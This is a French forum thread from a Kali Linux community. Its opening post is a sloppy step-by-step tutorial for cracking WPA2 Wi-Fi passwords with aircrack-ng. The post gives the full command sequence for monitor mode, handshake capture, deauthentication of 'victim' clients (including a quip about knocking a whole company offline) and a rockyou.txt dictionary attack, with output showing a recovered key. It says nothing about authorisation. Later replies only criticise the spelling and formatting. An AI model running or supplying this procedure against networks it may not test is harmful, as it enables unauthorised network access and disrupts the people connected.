Auteur Sujet: tutorial aircrack-ng cracker une wpa2  (Lu 5919 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
tutorial aircrack-ng cracker une wpa2
« le: 04 mai 2019 à 23:55:02 »
tutoriel aircrack-ng cracker un réseaux wifi avec le protocole de sécurité wpa2  AVEC UNE ATTAQUE PAR BRUTE FORCEUR DE FEMMES



wpa2 (wi-fi protected access 2 )est un mécanisme qui sert a sécurisé les reseaux sans-fil wi-fitte mdr
il a été créer au début des années 2000 a cause des faiblesse trouver dans le wep (protocole de sécurité réseaux)

wap (numero 1)il a été concu pour remplacer wep


pour defoncer une wap2 il faut au prealable avoir aircrack-ng dinstaller a vous de chercher comment car jai kali linux et il viens avec dans attaque de mot de passe sans fil (dans applications) par défaut


ensuite il vous faut un point d'accès sans fil et une carte réseaux sans fil qui sert a injecter des paquets il vous en faut absolument une sinon sa va pas fonctionner regarder en ligne aircrack-ng tutorial si vous me croyez pas il des information sur le site de aircrack-ng.org qui vous dise que vous etes obliger davoir un carte reseau sans-fil.

pour savoir si vous carte reseaux supporte le mode moniteur taper

airmon-ng dans un terminal et si sa vous sort quelque chose comme moi votre carte est compatible ! fiou pas besoin den acheter une ! 

airmon-ng

PHY   Interface   Driver      Chipset

phy0   wlan0mon   iwlwifi      Intel Corporation Centrino Wireless-N 105 (rev c4)

trop chanceux

votre carte reseau est peut etre sans fil et supporte le mode moniteur comme la mienne jai pas eu besoin den acheter ce qui est tres rare sinon acheter une carte reseaux sans fil sur ce site:

http://aircrack-ng.org/doku.php?id=faq#what_is_the_best_wireless_card_to_buy

sa vous dis quelque carte sont les meilleurs et quel acheter comme autre possibilité

acheter la alpha patente cest une bonne


donc pour commencer taper airmon-ng

ensuite airmon-ng start <votre_interface> genre wlan0 pour mettre votre carte en mode moniteur (promiscuous)
 
airmon-ng stop <votre_interface> pour enlever le mode moniteur

sa permet a votre carte dinjecter des paquets

ensuite taper iwconfig qui sert a  configurer les interfaces reseaux lafficher dans notre cas lafficher


et il faut que sa soit écrit mode:monitor a coter de mode


ensuite il nous faut une cible un point dacces; pour les connaitre taper

airodump-ng <interface_dans_iwconfig>

ensuite vous pouvez voir quil a un bssid et un essid qui correspond au nom du reseaux defois abrégé ssid et bssid correspond a la mac adresse du point d'accès réseaux


wpa2 utilise un "4-way handshake" pour authentifier les appareils au reseaux
on dois capturer le handshake pour se cracker le mot de passe réseau
les handshake se produise lorsque quelqun se connecte au reseau
donc va falloir attendre quil se connecte au reseaux ouais je sais cest de la vrai merde

mais on peut avec  le "deauth attack"  envoyer des paquets de desauthentification  a un client connecter au reseau quon esseye de cracker

À la réception de tels paquets, la plupart des clients se déconnectent du réseau et se reconnectent immédiatement, vous offrant une  4-way handshake si vous écoutez avec airodump-ng

allons y avec le deauth attack


utilisons airodump-ng pour monitorier un point dacces specifique
-c channel
--bssid MAC interface

-c le canal trouver avec airmon-ng wlan0mon
-b ou --bssid le bssid bah la mac adresse du ap  visible depuis airmon-ng wlan0mon
-w le fichier de capture quon va mettre le handshake dedans



root@kali:~# airodump-ng -c 11 -b 04:BF:6D:5C:43:C0 -w handshake wlan0mon

maintenant cher personne ouvrons un nouveau terminal/bash/shell/command line  LAISSER CE TERMINAL OUVERT SI VOUS VOULEZ avoir  le handshake

on va utiliser aireplay-ng pour envoyer des paquets de desauthentification  a la victime /je_suis_impoli/

le forcant a se reconnecter au reseau et obtenir un handshake dans le processus




maintenant deuxieme etape taper sa  ou bien ya une alternative
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

-0 2 spéficie le nombre de paquets de desauthetification 2 suffit pour moi 
-a  le bssid(le mac adresse du acces point)
-c cest la client mac adress genre dans votre airodump-ng -c 11 -b 04:BF:6D:5C:43:C0 wlan0mon sous station prenez celui qui a le plus de frame sa fera laffaire

et linterface dans iwconfig la je pense qui vous vous en doutez


vous pouvez aussi envoyez des paquet de deauth (desauthetifaication a tout les client)
aireplay-ng  -0 2  -a 9C:5C:8E:C9:AB:C0 wlan0mon

sa fait plus de bruit si toute une entreprise est deconnecter pendant 20 secondes y peuvent supecter quelque chose mdr

une fois ceci fais dans votre airodump-ng vous aller voir le handshake apparaitre en haut a gauche en 1 secondes  dans votre autre terminal si vous lavez laisser ouvert évidemment






















maintenant autre maniere de trouver le handshake


donc va falloir utiliser airodump-ng -c le numero du canal vu avec la commande:airodump-ng wlan0mon
le bssid du point dacces disponible avec la commande airodump-ng wlan0mon / -w pour le nom du fichier dans lequel le handshake va etre capturer puis le nom de votre interface avec iwconfig

genre sa je vous conseille de noter cest informations ou de laisser le terminal ouvert pour pouvoir y acces plus tard ya toujours la commande history pour le bssid mais bon

airodump-ng -c 11 --bssid 9C:5C:8E:C9:AB:C0 -w fichier_handshake_pourmonreseau wlan0mon

la vous attendez et a droite de   CH 11 ][ Elapsed: 1 min ][ 2019-04-22 15:48 ][ fixed channel wlan0mon: 12                    vous aller voir handshake capturer avec le code               

perso jai tester avec mon telephone je lai deconnecter mais faut attendre genre un bon 0.01 secondes sinon sa marche pas

SI VOUS AVEZ DEUX TERMINAL COMME MOI LE CON DOUVERT la handshake va apparaitre a lecran que 1 secondes cest pour sa que vous pouvez pas le capturer mdr

donc le handshake 04:FB.etc

maintenant ls -lhrt pour voir le dernier fichier

on a sa:
 -rw-r--r--  1 root root 172K avr 22 16:09  filecapturenetworkpasswordblablabla.txt-02.log.csv
-rw-r--r--  1 root root 4,1K avr 22 16:09  filecapturenetworkpasswordblablabla.txt-02.kismet.netxml
-rw-r--r--  1 root root  597 avr 22 16:09  filecapturenetworkpasswordblablabla.txt-02.kismet.csv
-rw-r--r--  1 root root  592 avr 22 16:09  filecapturenetworkpasswordblablabla.txt-02.csv
-rw-r--r--  1 root root 187K avr 22 16:09  filecapturenetworkpasswordblablabla.txt-02.cap

cest le cap qui nous interesse et aircrack rajoute -00 le numero appres les fichiers


vous pouvez le renommer avec mv filecapturenetworkpasswordblablabla.txt-02.cap handshake_videotron3591.cap meme si vous metter pas le cap a la fin sa marche pour linstant 22 avril 2019 mdr



maintenant
CRACKER LE RESEAUTIEN AVEC CE CHER AIRCRACK-NG

il vous faut une wordlist qui est une liste de mot je vous conseille de taper wordlist wpa2  car si vous prenez une wordlist de mot si le mot de passe est plein de caracteres étrange sa va rien servir


perso jai pris celle par défaut sous kali linux taper cp /usr/share/wordlists/rockyou.txt.gz ~/Bureau par exemple ensuite manuellement cliquer dessus et avec les gestionnaires darchives taper extraire vers ex bureau

et la metter votre code de reseaux dedans genre ligne 200 pour faire semblant que vous etes un vrai pirate crack head .

ya celle de cracking workstation qui est volumineuse et qui est utile assez utile

ensuite

aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt fichier_handshake_pourmonreseau-00.cap

-a2 pour le protocole de sécurité réseau wap2 -b pour le bssis (mac adresse de l'ap(acces point)(points dacces))

-w la liste de mots 
hackme.cap le 4-way handshake

Aircrack-ng 1.5.2

      [00:00:17] 22383/7120754 keys tested (1272.55 k/s)

      Time left: 1 hour, 33 minutes, 0 seconds                   0.31%

                         KEY FOUND! [ V3XAY9FHH744H ]


      Master Key     : B1 E8 F7 33 E4 86 2C D3 91 D2 71 B0 BB 7C A5 2C
                       63 E5 70 1B 21 10 FB 4C 04 79 77 EA 1F E0 8C 71

      Transient Key  : D4 33 90 2E F8 E9 B7 AB 37 FB A8 D4 BA 67 D0 B8
                       A0 F2 9F E2 AB C3 A9 EE 8E 7E 77 A2 2A E5 1D A1
                       A8 D2 21 D1 1B 9A 7E 85 12 30 4B 9E EC 28 91 8A
                       DC 58 34 6C 5A 30 CE E2 B8 9B 61 EF 10 E0 F8 F5

      EAPOL HMAC     : 72 C3 66 03 79 B5 35 4E 35 29 86 C6 FB 31 BE 0A


ensuite taper airmon-ng stop <inteface_dans_iwconfig> pour enlever le mode moniteur

et taper service network-manager restart separement
service networking restart
pour redemarrer les service reseaux et retrouver votre connection internet car avec airmon-ng check kill on a enlever des trucs du reseaux et je sais pas comment le retablir a part comme sa

voila le réseaux a été cracker avec succes piratage du siecle mdr
MERCI davoir suivi ce tutoriel regarder dans la section wi-fi hacking pour voir dautre methode de crack ou dautre outils qui font le travail similairement

notes personnels:
------------------------------------
airmon-ng
airmong-ng start wlan0
iwconfig
airmon-ng check kill  liste les programmes qui peuvent interferer avec la carte sans fil réseau si kill est spécifié sa les tue toutes mdr
-----------------------------------
pour commencer sois sa
1- airodump-ng wlan0mon
2- airodump-ng -c 11 --bssid 9C:5C:8E:C9:AB:C0 -w fichier_handshake_pourmonreseau wlan0mon

ou  sois sa
0-airodump-ng wlan0mon ensuite fermer retenir le mac adress ap et le canal vérifier nos noms de fichiers pour voir si il est deja utiliser
1- airodump-ng -c 11 -b 04:BF:6D:5C:43:C0 -w handshake_reseau1 wlan0mon
2- possibilité ici: aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0   
2.1 ou a place du 2   aireplay-ng  -0 2  -a 9C:5C:8E:C9:AB:C0 wlan0mon
 airmon-ng stop <inteface_dans_iwconfig> et marche  peut etre --deauth 20 ou autre a place de -0 2

------------------------------------------

ensuite
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt fichier_handshake_pourmonreseau-00.cap

service network-manager restart
service networking restart


-----------------------------------------
outil utiliser dans la suite aircrack-ng
airodump-ng outil de capture de paquet pour aircrack-ng
airmon-ng tourne les cartes en mode moniteurs
aircrack-ng crack les clé wep/wpa

airmon-ng stop interface pour stopper le mode moniteur
« Modifié: 05 mai 2019 à 02:36:02 par rezohs21 »

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2490
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #1 le: 05 mai 2019 à 15:08:07 »
c'est tout bonnement illisible , utilise des balises code ^^
Mess  with the bests.
Die like the rest.

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #2 le: 05 mai 2019 à 16:35:31 »
jcomprend pas xD genre du html ? tu veux que je mette des <br>?

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1393
  • +98/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #3 le: 05 mai 2019 à 16:46:54 »
Quand tu redige un message tu as le "#" au dessus des emoticones...  C'est ça!!
En faite c'est code et /code entre crochet qui donne cela:
commande
Sinon, on comprend rien...  :P
« Modifié: 05 mai 2019 à 17:23:52 par Snk »
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
A l'époque c'était système_D (Comme démerdes-toi!)
Anti GAFAM - Brûlons les tous!

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2490
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #4 le: 06 mai 2019 à 09:14:18 »
Merci Snk :P
Mess  with the bests.
Die like the rest.

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1393
  • +98/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #5 le: 06 mai 2019 à 17:49:46 »
Ce fut laborieux...  :P
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
A l'époque c'était système_D (Comme démerdes-toi!)
Anti GAFAM - Brûlons les tous!

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #6 le: 07 mai 2019 à 02:15:05 »
dsl mais prochaine fois je fais mettre du code des liste du underline du bold et centre le texte a certain endroit tinquiete mais la jai la flemme et je comprend pas moi je trouve sa lissible et non laborieux mdrrrr jdeconne

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2490
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #7 le: 07 mai 2019 à 09:01:11 »
Pense à soigner ton orthographe aussi :)
Mess  with the bests.
Die like the rest.

Hors ligne WarLocG

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 474
  • +67/-0
  • Spé Code Python Java Bash
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #8 le: 07 mai 2019 à 12:23:00 »
Citation de: rezohs21
dsl mais prochaine fois je fais mettre du code des liste du underline du bold et centre le texte a certain endroit tinquiete mais la jai la flemme et je comprend pas moi je trouve sa lissible et non laborieux mdrrrr jdeconne
Tu appelles ca lisible ? Et tu es satisfait avec ca ? Pour ce qui est de ta mise en forme, prend exemple => https://linuxtrack.net/viewtopic.php?id=20
C'est un tutoriel que j'ai écris il y a longtemps sur linuxtrack.

Avant de démarrer de nouveaux sujets de tutoriels (on t'en remercie au passage), remanie déjà ceux que tu viens de créer afin de soigner ce qui ne va pas dedans:
-> Ton orthographe pour commencer. Une orthographe soignée qui ne fait saigner des yeux c'est déjà respecter tes lecteurs. Rappelle toi que le forum est publique et consulté par toutes les tranches d'âges (il a autant des vieux que des jeunes qui le parcourt). Ne rédige pas tes tutoriels comme si tu envoyais un texto à un copain et ne te dévalorise pas dedans non plus.
-> La mise en forme. Comme Snk et ZeR0-@bSoLu te l'ont déjà fait remarquer: place tes commandes / résultats de commandes entre balise code. Organise mieux ton tutoriel avec des gras / italique / couleur ou souligné pour mettre de l'emphase sur des éléments clés.
Ces remarques s'appliquent à tous tes tutoriels.
-> Cite tes sources et si possibles les auteurs ayant écrit des parties de tes tutoriels, c'est beaucoup plus éthique déjà.
-> Applique toi et montre ton sérieux, ne fait pas les choses à moitié et ne commente pas pour dire que tu as la flemme. Evites les mdr, trololol etc C'est pas parce qu'on est sur un forum que tu dois te montrer négligeant et prendre la chose trop à la rigolade. Tu présentes du contenu à des individus que tu ne connais pas en personne. C'est pas différent d'un travail d'école voir d'un travail tout court.

Bon courage.
A lire avant de poser vos questions : http://www.linux-france.org/article/these/smart-questions/smart-questions-fr.html
Pour les questions de base sous debian : https://debian-facile.org/index-df.php
Veuillez utiliser la fonction Rechercher avant de poster.

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2490
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Re : tutorial aircrack-ng cracker une wpa2
« Réponse #9 le: 07 mai 2019 à 12:33:12 »
Citation de: rezohs21
dsl mais prochaine fois je fais mettre du code des liste du underline du bold et centre le texte a certain endroit tinquiete mais la jai la flemme et je comprend pas moi je trouve sa lissible et non laborieux mdrrrr jdeconne
Tu appelles ca lisible ? Et tu es satisfait avec ca ? Pour ce qui est de ta mise en forme, prend exemple => https://linuxtrack.net/viewtopic.php?id=20
C'est un tutoriel que j'ai écris il y a longtemps sur linuxtrack.

Avant de démarrer de nouveaux sujets de tutoriels (on t'en remercie au passage), remanie déjà ceux que tu viens de créer afin de soigner ce qui ne va pas dedans:
-> Ton orthographe pour commencer. Une orthographe soignée qui ne fait saigner des yeux c'est déjà respecter tes lecteurs. Rappelle toi que le forum est publique et consulté par toutes les tranches d'âges (il a autant des vieux que des jeunes qui le parcourt). Ne rédige pas tes tutoriels comme si tu envoyais un texto à un copain et ne te dévalorise pas dedans non plus.
-> La mise en forme. Comme Snk et ZeR0-@bSoLu te l'ont déjà fait remarquer: place tes commandes / résultats de commandes entre balise code. Organise mieux ton tutoriel avec des gras / italique / couleur ou souligné pour mettre de l'emphase sur des éléments clés.
Ces remarques s'appliquent à tous tes tutoriels.
-> Cite tes sources et si possibles les auteurs ayant écrit des parties de tes tutoriels, c'est beaucoup plus éthique déjà.
-> Applique toi et montre ton sérieux, ne fait pas les choses à moitié et ne commente pas pour dire que tu as la flemme. Evites les mdr, trololol etc C'est pas parce qu'on est sur un forum que tu dois te montrer négligeant et prendre la chose trop à la rigolade. Tu présentes du contenu à des individus que tu ne connais pas en personne. C'est pas différent d'un travail d'école voir d'un travail tout court.

Bon courage.

Une véritable madelaine de Proust qui me rappelle que il y a des sacrés bons membres sur ce forum
Mess  with the bests.
Die like the rest.

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3785
  • +263/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Re : tutorial aircrack-ng cracker une wpa2
« Réponse #10 le: 07 mai 2019 à 17:22:18 »
Citation de: rezohs21
dsl mais prochaine fois je fais mettre du code des liste du underline du bold et centre le texte a certain endroit tinquiete mais la jai la flemme et je comprend pas moi je trouve sa lissible et non laborieux mdrrrr jdeconne
Tu appelles ca lisible ? Et tu es satisfait avec ca ? Pour ce qui est de ta mise en forme, prend exemple => https://linuxtrack.net/viewtopic.php?id=20
C'est un tutoriel que j'ai écris il y a longtemps sur linuxtrack.

Avant de démarrer de nouveaux sujets de tutoriels (on t'en remercie au passage), remanie déjà ceux que tu viens de créer afin de soigner ce qui ne va pas dedans:
-> Ton orthographe pour commencer. Une orthographe soignée qui ne fait saigner des yeux c'est déjà respecter tes lecteurs. Rappelle toi que le forum est publique et consulté par toutes les tranches d'âges (il a autant des vieux que des jeunes qui le parcourt). Ne rédige pas tes tutoriels comme si tu envoyais un texto à un copain et ne te dévalorise pas dedans non plus.
-> La mise en forme. Comme Snk et ZeR0-@bSoLu te l'ont déjà fait remarquer: place tes commandes / résultats de commandes entre balise code. Organise mieux ton tutoriel avec des gras / italique / couleur ou souligné pour mettre de l'emphase sur des éléments clés.
Ces remarques s'appliquent à tous tes tutoriels.
-> Cite tes sources et si possibles les auteurs ayant écrit des parties de tes tutoriels, c'est beaucoup plus éthique déjà.
-> Applique toi et montre ton sérieux, ne fait pas les choses à moitié et ne commente pas pour dire que tu as la flemme. Evites les mdr, trololol etc C'est pas parce qu'on est sur un forum que tu dois te montrer négligeant et prendre la chose trop à la rigolade. Tu présentes du contenu à des individus que tu ne connais pas en personne. C'est pas différent d'un travail d'école voir d'un travail tout court.

Bon courage.
Rien n'a rajouter, si ce n'est que ça manque de modérateurs sur ce forum, mais je pense que WarLocG est un peu débordé tout comme moi pour le job.

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #11 le: 08 mai 2019 à 01:04:57 »
JE SUIS un gitan l'orthographe ses pas mon truc et je vais faire attention prochaine fois

Hors ligne WarLocG

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 474
  • +67/-0
  • Spé Code Python Java Bash
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #12 le: 08 mai 2019 à 11:42:54 »
Je me demande quand même. As-tu compris que mon message visait à t'encourager et non a te descendre ? Parce que ta réaction fait peur.

Si ton orthographe n'est pas impeccable à la virgule près, c'est pas dramatique. Nous sommes évidemment conscient qu'il y a des gens présentant un handicap avec l'écriture. Cela étant, nous ne sommes pas dupes et sommes capable de distinguer une personne en difficulté mais fournissant des efforts pour se relire et s'autocorriger d'une personne qui n'en a royalement rien à foutre. En plus, tu l'as dis toi-même que tu avais la flemme. Donc, prend du recul et regarde ce que tu as écrit avec un autre regard. Avec de la logique tu ne choisirais pas plutôt la 2e option ?

Et tu te dévalorise à nouveau : être gitan ne t'empêche pas de te prendre en main.

Je t'ai donné des clefs pour te permettre d'améliorer tes tutoriels, libre à toi de les utiliser ou pas. Je n'interviendrai plus sur ce sujet à partir d'ici.

Cordialement

Edit: Je peux voir qu'un effort est fait sur l'orthographe par rapport aux premiers jets. Mais je t'encourage à continuer à te relire.
« Modifié: 08 mai 2019 à 12:42:35 par WarLocG »
A lire avant de poser vos questions : http://www.linux-france.org/article/these/smart-questions/smart-questions-fr.html
Pour les questions de base sous debian : https://debian-facile.org/index-df.php
Veuillez utiliser la fonction Rechercher avant de poster.

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #13 le: 08 mai 2019 à 22:34:57 »
ok merci je vais faire attention et non jen ai pas rien  a foutre au début oui je vais pas mentir mais la sa fais 5 personne qui me disent de faire attention la je me souci oui

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2490
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : tutorial aircrack-ng cracker une wpa2
« Réponse #14 le: 09 mai 2019 à 09:03:34 »
Ces paroles ne seront pas oubliées :)
Mess  with the bests.
Die like the rest.